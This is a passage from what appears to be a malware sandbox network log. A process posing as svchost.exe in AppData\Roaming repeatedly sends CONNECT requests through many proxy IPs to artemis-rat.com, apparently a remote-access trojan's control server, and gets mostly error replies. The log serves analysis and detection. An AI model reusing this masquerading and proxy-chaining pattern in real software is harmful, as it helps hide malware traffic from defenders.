                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2871192.168.2.559400209.97.150.167312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.211709976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.224658966 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2872192.168.2.559313212.108.155.205909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.212230921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2873192.168.2.559304218.65.6.150312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.214668989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.577833891 CET704INHTTP/1.1 502 Bad Gateway
                                                                                    Server: huawei
                                                                                    Date: Sat, 09 Mar 2024 12:01:52 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 553
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 75 61 77 65 69 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>huawei</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2874192.168.2.559107117.160.250.163808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.233104944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.646058083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.833692074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.426767111 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2875192.168.2.556896138.68.155.224466043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.234463930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2876192.168.2.55936146.35.9.1108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.236162901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2877192.168.2.559347110.12.211.1408043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.237519979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2878192.168.2.55934643.155.130.1821567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.238806009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2879192.168.2.55936923.137.248.197888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.241118908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2880192.168.2.55936751.15.247.931637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.241122961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2881192.168.2.559345185.158.114.142569743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.251075983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2882192.168.2.55935927.96.235.1718043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.251075983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.557735920 CET326INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2883192.168.2.55859151.161.131.844920243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.253117085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.964725971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.677725077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.020589113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677675962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2884192.168.2.559365121.164.200.18108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.255842924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2885192.168.2.559360168.138.231.177312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.275988102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.964718103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.974633932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2886192.168.2.559387188.166.17.18888143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.305016994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.606606960 CET310INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 150
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2887192.168.2.55939182.210.56.2518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.305018902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.145659924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146315098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.146348953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2888192.168.2.558687203.19.38.114108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.305558920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.145848989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146373034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.146445990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2889192.168.2.55937043.133.70.571567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.305562973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2890192.168.2.559417201.174.239.28415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.305972099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2891192.168.2.559422142.54.228.193414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.307763100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2892192.168.2.558715148.72.215.230499043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.309389114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.146176100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2893192.168.2.559407221.153.92.398043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.311101913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2894192.168.2.55936845.11.95.165521943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.311180115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2895192.168.2.55938614.103.24.20800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.313497066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2896192.168.2.559154183.234.215.11844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.317084074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.019829988 CET536INHTTP/1.1 405 Not Allowed
                                                                                    Server: nginx/1.24.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 559
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.24.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to dis


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2897192.168.2.55939982.137.244.2448043312C:\Users\user\AppData\Roaming\svchost.exe
